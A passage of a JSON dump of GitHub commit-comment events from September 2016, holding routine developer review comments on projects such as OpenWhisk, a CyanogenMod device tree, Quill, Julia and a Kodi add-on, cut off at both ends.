  tools:context=\"com.example.android.sunshine.app.MainActivity\"\r\n    android:id=\"@+id/container\">\r\n</FrameLayout>\r\n\r\nYour placeholder_fragment.xml OR fragment_main.xml should look like this\r\n<FrameLayout xmlns:android=\"http://schemas.android.com/apk/res/android\"\r\n    xmlns:tools=\"http://schemas.android.com/tools\"\r\n    android:layout_width=\"match_parent\"\r\n    android:layout_height=\"match_parent\"\r\n    tools:context=\"com.example.android.sunshine.app.MainActivityFragment\">\r\n\r\n    <!-- TODO: Update blank fragment layout -->\r\n    <ListView\r\n        android:layout_width=\"match_parent\"\r\n        android:layout_height=\"match_parent\"\r\n        android:id=\"@+id/listview_forecast\" />\r\n\r\n</FrameLayout>\r\n\r\nAnd lastly your list_item_forecast.xml should look like this\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<TextView xmlns:android=\"http://schemas.android.com/apk/res/android\"\r\n    android:layout_width=\"match_parent\"\r\n    android:layout_height=\"wrap_content\"\r\n    android:id=\"@+id/list_item_forecast_textview\"\r\n    android:gravity=\"center_vertical\"\r\n    android:minHeight=\"?android:attr/listPreferredItemHeight\">\r\n\r\n</TextView>\r\n\r\n\r\nI am running this code on 9/10/16 and it is working. "}},"created_at":"2016-09-11T06:02:00Z"}
{"id":"4545305239","type":"CommitCommentEvent","actor":{"login":"jafdy"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18976148,"position":252,"line":2396,"path":"data/wanderer missions.txt","commit_id":"a565ff8d8fb86d23e0790b42843167a5c8122afd","created_at":"2016-09-11T06:02:40Z","updated_at":"2016-09-11T06:02:40Z","body":"It would be nice to have a positive choice here. All the options seem againsed the Pug."}},"created_at":"2016-09-11T06:02:40Z"}
{"id":"4545305616","type":"CommitCommentEvent","actor":{"login":"navy57"},"repo":{"name":"Titeflafla/IObit_Unlocker"},"payload":{"comment":{"id":18976149,"position":null,"line":null,"path":null,"commit_id":"2389f57d6b5f72e1b31201fc203b341a93fc14e1","created_at":"2016-09-11T06:03:03Z","updated_at":"2016-09-11T06:03:03Z","body":"\r\n[IObitUnlocker.zip](https://github.com/Titeflafla/IObit_Unlocker/files/465782/IObitUnlocker.zip)\r\n[French_lang_IObit110916.zip](https://github.com/Titeflafla/IObit_Unlocker/files/465785/French_lang_IObit110916.zip)\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-11T06:03:03Z"}
{"id":"4545305760","type":"CommitCommentEvent","actor":{"login":"navy57"},"repo":{"name":"Titeflafla/IObit_Unlocker"},"payload":{"comment":{"id":18976150,"position":6,"line":9,"path":"README.md","commit_id":"2389f57d6b5f72e1b31201fc203b341a93fc14e1","created_at":"2016-09-11T06:03:11Z","updated_at":"2016-09-11T06:03:11Z","body":"Fichier éxécutable modifier pour être adapté à la langue française\r\n"}},"created_at":"2016-09-11T06:03:11Z"}
{"id":"4545305778","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18976151,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T06:03:12Z","updated_at":"2016-09-11T06:03:12Z","body":"Do you know how to skip CM Setup Wizard? it keeps crash when setting up Wi-Fi."}},"created_at":"2016-09-11T06:03:12Z"}
{"id":"4545306022","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18976152,"position":16,"line":45,"path":"README.md","commit_id":"cc5b003e8f905c5c056a42be7621aa9552c55be8","created_at":"2016-09-11T06:03:23Z","updated_at":"2016-09-11T06:03:23Z","body":"There are two points here and they are disconnected. \r\n\r\nHow about: Docker must be natively installed in order to build and deploy OpenWhisk. If you plan to make contributions to OpenWhisk, we recommend a Mac Or Ubuntu environment. "}},"created_at":"2016-09-11T06:03:23Z"}
{"id":"4545307038","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18976153,"position":15,"line":41,"path":"tools/macos/README.md","commit_id":"cc5b003e8f905c5c056a42be7621aa9552c55be8","created_at":"2016-09-11T06:03:59Z","updated_at":"2016-09-11T06:03:59Z","body":"You removed the closing tick and pipe into bash. "}},"created_at":"2016-09-11T06:03:59Z"}
{"id":"4545307427","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18976154,"position":33,"line":38,"path":"tools/vagrant/README.md","commit_id":"cc5b003e8f905c5c056a42be7621aa9552c55be8","created_at":"2016-09-11T06:04:23Z","updated_at":"2016-09-11T06:04:23Z","body":"What is safe redeploy?"}},"created_at":"2016-09-11T06:04:23Z"}
{"id":"4545307740","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18976155,"position":52,"line":61,"path":"tools/vagrant/README.md","commit_id":"cc5b003e8f905c5c056a42be7621aa9552c55be8","created_at":"2016-09-11T06:04:42Z","updated_at":"2016-09-11T06:04:42Z","body":"Based on..."}},"created_at":"2016-09-11T06:04:42Z"}
{"id":"4545308217","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18976156,"position":53,"line":62,"path":"tools/vagrant/README.md","commit_id":"cc5b003e8f905c5c056a42be7621aa9552c55be8","created_at":"2016-09-11T06:05:09Z","updated_at":"2016-09-11T06:05:09Z","body":"Remove \"to be able\". "}},"created_at":"2016-09-11T06:05:09Z"}
{"id":"4545308916","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18976157,"position":53,"line":62,"path":"tools/vagrant/README.md","commit_id":"cc5b003e8f905c5c056a42be7621aa9552c55be8","created_at":"2016-09-11T06:05:46Z","updated_at":"2016-09-11T06:05:46Z","body":"-i is not optional. The wording should make it more clear that it is required when using an invalid SSL certificate.  "}},"created_at":"2016-09-11T06:05:46Z"}
{"id":"4545309890","type":"CommitCommentEvent","actor":{"login":"ericmjl"},"repo":{"name":"Starnite/protein-systematic-characterization"},"payload":{"comment":{"id":18976158,"position":20,"line":27,"path":"experiments/20160805-mutagenesis/20160908-cpec.md","commit_id":"afe8e0c113fccbfdc35273a3d68943849de42405","created_at":"2016-09-11T06:06:42Z","updated_at":"2016-09-11T06:06:42Z","body":"I'm going to push a protocol for the KAPA enzyme under \"protocols\". Could you link to that on this line after you pull over changes from my repo?"}},"created_at":"2016-09-11T06:06:42Z"}
{"id":"4545310129","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18976159,"position":116,"line":129,"path":"tools/vagrant/README.md","commit_id":"cc5b003e8f905c5c056a42be7621aa9552c55be8","created_at":"2016-09-11T06:06:56Z","updated_at":"2016-09-11T06:06:56Z","body":"Already documented the build step above. This should enumerate the deployment only. "}},"created_at":"2016-09-11T06:06:56Z"}
{"id":"4545310258","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18976160,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T06:07:04Z","updated_at":"2016-09-11T06:07:04Z","body":"So I guess RAM is the one fvcking us.\r\nAnyway I did here about enterprise mode in CM which would skip the setup, but I am not sure whether its valid in later CMs or not.\r\nI guess you could grant permissions from adb, thats the only reason I can make out for the crash"}},"created_at":"2016-09-11T06:07:04Z"}
{"id":"4545313061","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18976170,"position":70,"line":158,"path":"tools/vagrant/Vagrantfile","commit_id":"cc5b003e8f905c5c056a42be7621aa9552c55be8","created_at":"2016-09-11T06:09:58Z","updated_at":"2016-09-11T06:09:58Z","body":"If this is using the aliased wsk -i a comment is appropriate here. "}},"created_at":"2016-09-11T06:09:58Z"}
{"id":"4545313122","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18976171,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T06:10:01Z","updated_at":"2016-09-11T06:10:01Z","body":"OK, I solved it by boot into recovery and removed CM Setup WIzard.\n\n2016-09-11 13:07 GMT+07:00 Avinaba Dalal <notifications@github.com>:\n\n> So I guess RAM is the one fvcking us.\n> Anyway I did here about enterprise mode in CM which would skip the setup,\n> but I am not sure whether its valid in later CMs or not.\n> I guess you could grant permissions from adb, thats the only reason I can\n> make out for the crash\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ngoquang2708/android_device_samsung_vivalto3gvn/commit/8eabec87d135b7bcf77f867c5ed430da55d75295#commitcomment-18976160>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJOl9tKu2wVEMDhz8OQn2fxQU5WxuW-Oks5qo5qJgaJpZM4J4JOa>\n> .\n>\n"}},"created_at":"2016-09-11T06:10:01Z"}
{"id":"4545313259","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18976172,"position":57,"line":146,"path":"tools/vagrant/Vagrantfile","commit_id":"cc5b003e8f905c5c056a42be7621aa9552c55be8","created_at":"2016-09-11T06:10:11Z","updated_at":"2016-09-11T06:10:11Z","body":"These links are ok for Windows?"}},"created_at":"2016-09-11T06:10:11Z"}
{"id":"4545313588","type":"CommitCommentEvent","actor":{"login":"luiges90"},"repo":{"name":"luiges90/ZhongHuaSanGuoZhi"},"payload":{"comment":{"id":18976173,"position":null,"line":null,"path":null,"commit_id":"30cc7659f319520c13ecafc01dec24e8b6753884","created_at":"2016-09-11T06:10:26Z","updated_at":"2016-09-11T06:10:26Z","body":"我要先問一下"}},"created_at":"2016-09-11T06:10:26Z"}
{"id":"4545313689","type":"CommitCommentEvent","actor":{"login":"pernorc85"},"repo":{"name":"pernorc85/AirwayMechanics"},"payload":{"comment":{"id":18976174,"position":null,"line":null,"path":null,"commit_id":"d522388f079cdd3a0a7a69beaba9930f109b4740","created_at":"2016-09-11T06:10:33Z","updated_at":"2016-09-11T06:10:33Z","body":"growth and incompressible, a paradox"}},"created_at":"2016-09-11T06:10:33Z"}
{"id":"4545315851","type":"CommitCommentEvent","actor":{"login":"ericmjl"},"repo":{"name":"Starnite/protein-systematic-characterization"},"payload":{"comment":{"id":18976175,"position":24,"line":31,"path":"experiments/20160805-mutagenesis/20160908-cpec.md","commit_id":"afe8e0c113fccbfdc35273a3d68943849de42405","created_at":"2016-09-11T06:12:41Z","updated_at":"2016-09-11T06:12:41Z","body":"It'd be good to check what the DNA concentration is. It'd serve as a sanity check (we shouldn't have more DNA than we started with), and it'll help us know how much DNA gets lost at this step of assembly (there's always some DNA loss)."}},"created_at":"2016-09-11T06:12:41Z"}
{"id":"4545315936","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/Genesis-Plus-GX"},"payload":{"comment":{"id":18976176,"position":null,"line":null,"path":null,"commit_id":"2707890fe9b91e4b3326b4bf30b13ccf50d6dbb3","created_at":"2016-09-11T06:12:45Z","updated_at":"2016-09-11T06:12:45Z","body":"ToadKing - did you try this out locally on your end to see if it fixes the corrupted graphics?\r\n\r\nhttp://buildbot.libretro.com/web/\r\n\r\nIt still looks wrong here if you select the Genesis Plus GX core and select a ROM."}},"created_at":"2016-09-11T06:12:45Z"}
{"id":"4545316101","type":"CommitCommentEvent","actor":{"login":"benbro"},"repo":{"name":"quilljs/quill"},"payload":{"comment":{"id":18976177,"position":null,"line":null,"path":null,"commit_id":"085e1b8b74d850dbe2286536377cbb224ac55711","created_at":"2016-09-11T06:12:54Z","updated_at":"2016-09-11T06:12:54Z","body":"Did you mean to remove AlignAttribute from everywhere or just not register it as 'attributors/attribute/align'?\r\nIf the latter, it's not needed to import it in quill.js\r\n\r\nOn a second thought, maybe it's better to revert this PR and drop handling html attributes on paste?\r\nThe align attribute is deprecated. Support for the dir attribute is not critical. It seems that only LibreOffice use it. I don't think there are any other html attributes that we should have special support for them just because of dir.\r\n\r\nAre there other html attributes that need special support in addition to dir?\r\n\r\nSorry for the trouble."}},"created_at":"2016-09-11T06:12:54Z"}
{"id":"4545316736","type":"CommitCommentEvent","actor":{"login":"SacCs112KimElliot"},"repo":{"name":"SacCs112KimElliot/SAC_CS112-JAVA_Week03_BonusCalculator_ElliotKim"},"payload":{"comment":{"id":18976178,"position":null,"line":null,"path":null,"commit_id":"43529925c15208f4b897b49ace1a92730a83b818","created_at":"2016-09-11T06:13:41Z","updated_at":"2016-09-11T06:13:41Z","body":"Comment"}},"created_at":"2016-09-11T06:13:41Z"}
{"id":"4545317455","type":"CommitCommentEvent","actor":{"login":"quobebrew"},"repo":{"name":"quobebrew/ISEM501"},"payload":{"comment":{"id":18976179,"position":null,"line":null,"path":null,"commit_id":"1865b3612c0c9d561184856b37d7c2814e373b6c","created_at":"2016-09-11T06:14:28Z","updated_at":"2016-09-11T06:14:28Z","body":"First commit on github for ISEM assignment"}},"created_at":"2016-09-11T06:14:28Z"}
{"id":"4545321283","type":"CommitCommentEvent","actor":{"login":"staticfloat"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18976188,"position":null,"line":null,"path":null,"commit_id":"59cb3b4fa1dc1b9679a50ca54214301b67d679b6","created_at":"2016-09-11T06:18:23Z","updated_at":"2016-09-11T06:18:23Z","body":"> I don't like having Darwin or WINNT in the name, not obvious for users.\r\n\r\nTo play devil's advocate, this would only be visible to those that are running `make binary-dist`.  I think we have two options here:\r\n\r\n* Have `binary-dist` names based off of system primitives (e.g. `uname`) and map to nice names within buildbot for eventual user downloading.\r\n\r\n* Build a mapping into our Makefiles, and have the buildbot conform to those names completely.\r\n\r\nPersonally, I'm not a huge fan of building the mapping within our makefile system, I'd rather have the makefiles spit out whatever `$(OS)` gets mapped to when running `make binary-dist`, and then map that into a user-friendly name when uploading to AWS.\r\n\r\n> We should maybe rename osx to macos now.\r\n\r\nI was contemplating that.  I'm ambivalent, maybe `mac64` is a better suffix than `osx`?\r\n\r\n> potentially try to normalize nightly vs release\r\n\r\nYes, I agree, this would be good.  If we're going to change `osx` to `mac64` or something else, might as well fix as much as we can at once.  We can leave the old files in place for a while so that things that are running old scripts have a chance to change over."}},"created_at":"2016-09-11T06:18:23Z"}
{"id":"4545321897","type":"CommitCommentEvent","actor":{"login":"koquantam"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18976189,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T06:19:01Z","updated_at":"2016-09-11T06:19:01Z","body":"There's a package located in vendor/cm/config/common.mk that build CM setup Wizard\r\nRemove this line: CyanogenSetupWizard"}},"created_at":"2016-09-11T06:19:01Z"}
{"id":"4545322243","type":"CommitCommentEvent","actor":{"login":"fpletz"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18976191,"position":null,"line":null,"path":null,"commit_id":"27bc34f1e471991e43df028edc51159b12405120","created_at":"2016-09-11T06:19:22Z","updated_at":"2016-09-11T06:19:22Z","body":"Should be fixed with https://github.com/NixOS/nixpkgs/commit/c58654e2b78e7d3ae97ba96c80ceb3f96236e463."}},"created_at":"2016-09-11T06:19:22Z"}
{"id":"4545322346","type":"CommitCommentEvent","actor":{"login":"janisozaur"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":18976192,"position":3,"line":393,"path":"src/ride/vehicle.h","commit_id":"ba453db01f530eea3beb559d1b219e290fcdbd30","created_at":"2016-09-11T06:19:28Z","updated_at":"2016-09-11T06:19:28Z","body":"Aren't these supposed to be global and prefixed with `g`?"}},"created_at":"2016-09-11T06:19:28Z"}
{"id":"4545324447","type":"CommitCommentEvent","actor":{"login":"atamariya"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18976197,"position":null,"line":null,"path":null,"commit_id":"cc0b4f4b64247028fb7aac857f344e0bda8f2a8f","created_at":"2016-09-11T06:21:29Z","updated_at":"2016-09-11T06:21:29Z","body":"@Nadahar RequestHandlerV2 is actually a Netty subclass."}},"created_at":"2016-09-11T06:21:29Z"}
{"id":"4545325110","type":"CommitCommentEvent","actor":{"login":"oranagra"},"repo":{"name":"antirez/redis"},"payload":{"comment":{"id":18976198,"position":70,"line":1085,"path":"src/debug.c","commit_id":"6211e77ab643b6370a0b3cc2a07946ce31d6ad69","created_at":"2016-09-11T06:22:08Z","updated_at":"2016-09-11T06:22:08Z","body":"@antirez let's run this line only if __x86_64__ or __i386__"}},"created_at":"2016-09-11T06:22:08Z"}
{"id":"4545325156","type":"CommitCommentEvent","actor":{"login":"ZINGDING"},"repo":{"name":"rutgerkok/Pokkit"},"payload":{"comment":{"id":18976199,"position":null,"line":null,"path":null,"commit_id":"c1aae6eb776009ecbd65028ebe63cae2878580d3","created_at":"2016-09-11T06:22:11Z","updated_at":"2016-09-11T06:22:11Z","body":"@MrPowerGamerBR\r\nCan you make a pull request?"}},"created_at":"2016-09-11T06:22:11Z"}
{"id":"4545325447","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18976202,"position":5,"line":40,"path":"src/pocketmine/network/protocol/PlayerListPacket.php","commit_id":"9bb68f219c6caca0e9bc1414cc135e6b444b8aa8","created_at":"2016-09-11T06:22:28Z","updated_at":"2016-09-11T06:22:28Z","body":"yea, lol"}},"created_at":"2016-09-11T06:22:28Z"}
{"id":"4545326716","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18976204,"position":null,"line":null,"path":null,"commit_id":"9bb68f219c6caca0e9bc1414cc135e6b444b8aa8","created_at":"2016-09-11T06:23:43Z","updated_at":"2016-09-11T06:23:43Z","body":"Overall +1, but the elseif is veryyyy useless"}},"created_at":"2016-09-11T06:23:43Z"}
{"id":"4545327626","type":"CommitCommentEvent","actor":{"login":"Petitsurume"},"repo":{"name":"syuilo/misskey-web"},"payload":{"comment":{"id":18976207,"position":null,"line":null,"path":null,"commit_id":"b1d3f9c4925e176d62f2b97f299e6f076088ac31","created_at":"2016-09-11T06:24:39Z","updated_at":"2016-09-11T06:24:39Z","body":"問題なくはないけどエレガントではない気が"}},"created_at":"2016-09-11T06:24:39Z"}
{"id":"4545328298","type":"CommitCommentEvent","actor":{"login":"tpmamba"},"repo":{"name":"tpmamba/Hello-World"},"payload":{"comment":{"id":18976209,"position":3,"line":2,"path":"README.md","commit_id":"7c4cea65b953fdb2e931ca390920af313a5a96c5","created_at":"2016-09-11T06:25:17Z","updated_at":"2016-09-11T06:25:17Z","body":"I love you!"}},"created_at":"2016-09-11T06:25:17Z"}
{"id":"4545328687","type":"CommitCommentEvent","actor":{"login":"aycabta"},"repo":{"name":"aycabta/rubygems.org"},"payload":{"comment":{"id":18976212,"position":null,"line":null,"path":null,"commit_id":"fafb665cad2bb5b6682afee1b3441f130f943100","created_at":"2016-09-11T06:25:41Z","updated_at":"2016-09-11T06:25:41Z","body":"OK, this is continuation of https://github.com/aycabta/rubygems.org/commit/08738e1ed636ce086da923dcccda72740927d67d#commitcomment-18962698.\r\n\r\nI described at https://github.com/aycabta/rubygems.org/commit/08738e1ed636ce086da923dcccda72740927d67d#commitcomment-18965183, but I partly mistook. So I restate with fixes.\r\n\r\n> X more days\r\n\r\nThis days can be calculated when `reserved_namespace` is shown. So it's miscue that whole message is applied to both `reserved_namespace` and `not_hosted_notice`. I think that it's not single message.\r\n\r\n/cc @indirect "}},"created_at":"2016-09-11T06:25:41Z"}
{"id":"4545329890","type":"CommitCommentEvent","actor":{"login":"aycabta"},"repo":{"name":"aycabta/rubygems.org"},"payload":{"comment":{"id":18976216,"position":null,"line":null,"path":null,"commit_id":"08738e1ed636ce086da923dcccda72740927d67d","created_at":"2016-09-11T06:26:58Z","updated_at":"2016-09-11T06:26:58Z","body":"This discussion is continuous with https://github.com/aycabta/rubygems.org/commit/fafb665cad2bb5b6682afee1b3441f130f943100#commitcomment-18976005."}},"created_at":"2016-09-11T06:26:58Z"}
{"id":"4545330533","type":"CommitCommentEvent","actor":{"login":"aycabta"},"repo":{"name":"aycabta/rubygems.org"},"payload":{"comment":{"id":18976217,"position":7,"line":121,"path":"config/locales/en.yml","commit_id":"08738e1ed636ce086da923dcccda72740927d67d","created_at":"2016-09-11T06:27:35Z","updated_at":"2016-09-11T06:27:35Z","body":"This discussion is continuous with https://github.com/aycabta/rubygems.org/commit/fafb665cad2bb5b6682afee1b3441f130f943100#commitcomment-18976005."}},"created_at":"2016-09-11T06:27:35Z"}
{"id":"4545332783","type":"CommitCommentEvent","actor":{"login":"syuilo"},"repo":{"name":"syuilo/misskey-web"},"payload":{"comment":{"id":18976231,"position":null,"line":null,"path":null,"commit_id":"b1d3f9c4925e176d62f2b97f299e6f076088ac31","created_at":"2016-09-11T06:29:47Z","updated_at":"2016-09-11T06:29:47Z","body":"むしろ二重に情報を用意することの方がエレガントではない"}},"created_at":"2016-09-11T06:29:47Z"}
{"id":"4545335012","type":"CommitCommentEvent","actor":{"login":"jhchen"},"repo":{"name":"quilljs/quill"},"payload":{"comment":{"id":18976232,"position":null,"line":null,"path":null,"commit_id":"085e1b8b74d850dbe2286536377cbb224ac55711","created_at":"2016-09-11T06:31:46Z","updated_at":"2016-09-11T06:31:46Z","body":"I'm okay with keeping this. I had considered moving AlignAttribute to just clipboard.js but it seemed out of place and where it was implemented in the formats directory with the other attributors was more fitting. With that being the case the imports are necessary."}},"created_at":"2016-09-11T06:31:46Z"}
{"id":"4545338189","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18976234,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T06:34:36Z","updated_at":"2016-09-11T06:34:36Z","body":"Thanks."}},"created_at":"2016-09-11T06:34:36Z"}
{"id":"4545338586","type":"CommitCommentEvent","actor":{"login":"By-CheChe-K"},"repo":{"name":"By-CheChe-K/railsgirls"},"payload":{"comment":{"id":18976235,"position":null,"line":null,"path":null,"commit_id":"e191f972189727bea4e94fe7f1ceccea0bf260e7","created_at":"2016-09-11T06:34:59Z","updated_at":"2016-09-11T06:34:59Z","body":"@machikoyasuda i have a question!"}},"created_at":"2016-09-11T06:34:59Z"}
{"id":"4545339159","type":"CommitCommentEvent","actor":{"login":"benbro"},"repo":{"name":"quilljs/quill"},"payload":{"comment":{"id":18976236,"position":null,"line":null,"path":null,"commit_id":"085e1b8b74d850dbe2286536377cbb224ac55711","created_at":"2016-09-11T06:35:27Z","updated_at":"2016-09-11T06:35:27Z","body":"Thanks"}},"created_at":"2016-09-11T06:35:27Z"}
{"id":"4545342185","type":"CommitCommentEvent","actor":{"login":"cjritola"},"repo":{"name":"jtrfp/terminal-recall"},"payload":{"comment":{"id":18976239,"position":null,"line":null,"path":null,"commit_id":"3a70aca38a63fb0962a58f0a6e814e9eb4046d25","created_at":"2016-09-11T06:38:16Z","updated_at":"2016-09-11T06:38:16Z","body":"There may be a slight bug with missing letters in text, temporarily missing chunks of land/sky, etc. The cause of this issue is fairly understood and should be fixed soon."}},"created_at":"2016-09-11T06:38:16Z"}
{"id":"4545345110","type":"CommitCommentEvent","actor":{"login":"zebastian"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18976241,"position":null,"line":null,"path":null,"commit_id":"53e1b5e178af9f48d2f972bdad3261958eb49863","created_at":"2016-09-11T06:41:01Z","updated_at":"2016-09-11T06:41:01Z","body":"just a minute too late for push and got collisions :(\r\ncan you fix the ModifyImagePoint?\r\n\r\n  FIX projection for stereo\r\n    \r\n    top to bottom has been 720deg from left to right\r\n    left to right has been 180deg from left to right\r\n    -> changed to be always 360deg, now both eye tiles look the same for the\r\n    two arraangements\r\n\r\nshould be:\r\nCVector2<double> cStereo::ModifyImagePoint(CVector2<double> imagePoint)\r\n{\r\n\tCVector2<double> newImagePoint;\r\n\tswitch (stereoMode)\r\n\t{\r\n\t\tcase stereoDisabled: newImagePoint = imagePoint; break;\r\n\t\tcase stereoLeftRight:\r\n\t\t\tnewImagePoint.x = (fmod((imagePoint.x + 0.5) * 2.0, 1.0) - 0.5) * 2.0;\r\n\t\t\tnewImagePoint.y = imagePoint.y;\r\n\t\t\tbreak;\r\n\t\tcase stereoTopBottom:\r\n\t\t\tnewImagePoint.y = fmod((imagePoint.y + 0.5) * 2.0, 1.0) - 0.5;\r\n\t\t\tnewImagePoint.x = imagePoint.x * 0.5;\r\n\t\t\tbreak;\r\n\t\tcase stereoRedCyan: newImagePoint = imagePoint; break;\r\n\t}\r\n\treturn newImagePoint;\r\n}"}},"created_at":"2016-09-11T06:41:01Z"}
{"id":"4545346618","type":"CommitCommentEvent","actor":{"login":"shubhiD"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":18976242,"position":null,"line":null,"path":null,"commit_id":"a3c3fcd3af2e072a937a14f15a1ef2d842fabb11","created_at":"2016-09-11T06:42:30Z","updated_at":"2016-09-11T06:42:30Z","body":"aims at solving issue #9 "}},"created_at":"2016-09-11T06:42:30Z"}
{"id":"4545349400","type":"CommitCommentEvent","actor":{"login":"JiahuanChen"},"repo":{"name":"JiahuanChen/homework1"},"payload":{"comment":{"id":18976243,"position":null,"line":null,"path":null,"commit_id":"4856ff2b91137ff3a4edf8710bdb29a2a6911126","created_at":"2016-09-11T06:45:02Z","updated_at":"2016-09-11T06:45:02Z","body":"Added comments and did some adjustment."}},"created_at":"2016-09-11T06:45:02Z"}
{"id":"4545352112","type":"CommitCommentEvent","actor":{"login":"adrientetar"},"repo":{"name":"trufont/trufont"},"payload":{"comment":{"id":18976246,"position":null,"line":null,"path":null,"commit_id":"457111e6d1402acc7fe4842736e89ebc44744eef","created_at":"2016-09-11T06:47:52Z","updated_at":"2016-09-11T06:47:52Z","body":"sure, nice work."}},"created_at":"2016-09-11T06:47:52Z"}
{"id":"4545356991","type":"CommitCommentEvent","actor":{"login":"SilverFire"},"repo":{"name":"yiisoft-contrib/yiiframework.com"},"payload":{"comment":{"id":18976250,"position":null,"line":null,"path":null,"commit_id":"35ad912764cd1e4b73f2e3fe0ac2aa325502fa0e","created_at":"2016-09-11T06:52:40Z","updated_at":"2016-09-11T06:52:40Z","body":"Turn off ligatures for screenshot :)"}},"created_at":"2016-09-11T06:52:40Z"}
{"id":"4545360462","type":"CommitCommentEvent","actor":{"login":"chymz"},"repo":{"name":"chymz/ng2-select"},"payload":{"comment":{"id":18976261,"position":null,"line":null,"path":null,"commit_id":"e35184a12e91a1f74676c6af0de7f24e470de37d","created_at":"2016-09-11T06:56:18Z","updated_at":"2016-09-11T06:56:18Z","body":"If you read title of this pull request : it's only to make it compatible with form api"}},"created_at":"2016-09-11T06:56:18Z"}
{"id":"4545362495","type":"CommitCommentEvent","actor":{"login":"wrxtasy"},"repo":{"name":"wrxtasy/LibreELEC.tv.7.0"},"payload":{"comment":{"id":18976264,"position":null,"line":null,"path":null,"commit_id":"34802639f5990d26eafb9aebede0d310e1957aab","created_at":"2016-09-11T06:58:25Z","updated_at":"2016-09-11T06:58:25Z","body":"Thx. Yes I have been reading about this. I will also reference a further channel mapping report here:\r\nhttp://forum.odroid.com/viewtopic.php?f=144&t=23522"}},"created_at":"2016-09-11T06:58:25Z"}
{"id":"4545364020","type":"CommitCommentEvent","actor":{"login":"davsclaus"},"repo":{"name":"fabric8io/gofabric8"},"payload":{"comment":{"id":18976266,"position":14,"line":92,"path":"getfabric8.sh","commit_id":"4acc79d18cce034f733216414a59dfb4a9cdb436","created_at":"2016-09-11T07:00:00Z","updated_at":"2016-09-11T07:00:00Z","body":"Should the PATH include your username ?\r\n\r\nAlso maybe gofabric8 script can have a command that can automatic edit the PATH so end users can run this without changing their settings, for example if they just want to try it out. And if they want to run fabric8 again later they can just run\r\n\r\ngofabric8 set-env\r\n\r\nor something to setup environment, or it can be that eval thing that minishift does?\r\n\r\n"}},"created_at":"2016-09-11T07:00:00Z"}
{"id":"4545364789","type":"CommitCommentEvent","actor":{"login":"glennguy"},"repo":{"name":"glennguy/xbmc-addon-abc-iview"},"payload":{"comment":{"id":18976270,"position":null,"line":null,"path":null,"commit_id":"68cb5248a2891fc0acec76f606a5f1454f334d2a","created_at":"2016-09-11T07:00:32Z","updated_at":"2016-09-11T07:00:32Z","body":"@andybotting - I've tried and tried and cannot get it to play in multiple different Krypton builds. \r\n\r\nThere's definitely an issue with letting Kodi handle things natively, and I believe it's to do with how Akamai set their cookies. There's two cookies set - 'hdntl', and '_alid_'. I think the _alid_ isn't actually necessary. \r\n\r\nThe hdntl cookie always has a path value of '/'. I'm not a cookie expert but if there's one stored in the cookies.dat file, curl will send it when requesting basically anything and so we get 403 errors from that. I verified it sending a 4 hour old cookie earlier. There doesn't seem to be any way through Kodi's API to clear the cache either. A very bad solution could be to delete the cookies.dat from within the script, but half the time Kodi needs a restart anyway to see effects.\r\n\r\nManually picking the stream from the m3u8 and appending the cookies to the url string works great in Jarvis. In Krypton I'm seeing some pretty baffling behaviour.\r\n\r\nIf I send a correct cookie, everything runs fine up until ffmpeg needs to take over, at which point it's as if the 